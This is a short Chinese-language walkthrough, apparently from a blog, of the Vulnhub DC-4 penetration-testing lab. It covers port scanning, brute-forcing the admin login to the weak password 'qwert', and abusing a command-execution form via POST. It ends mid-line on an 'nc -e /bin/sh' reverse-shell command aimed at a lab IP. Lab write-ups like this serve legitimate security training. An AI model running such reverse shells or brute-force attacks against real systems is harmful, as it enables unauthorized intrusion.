Vulnhub滲透測試靶機DC-4

下載地址:https://www.vulnhub.com/entry/dc-4,313/ nmap沒有掃描到什麼有用端口 直接訪問80端口 只有一個認證框 沒有驗證 bp爆破admin弱密碼 發現密碼admin qwert 進入後臺 發現有執行命令的地方 抓包發現命令由post包傳過去 執行的命令由客戶端傳到了服務端 命令執行獲取shell 把nc -e /bin/sh 192.168.49.12
相關文章
相關標籤/搜索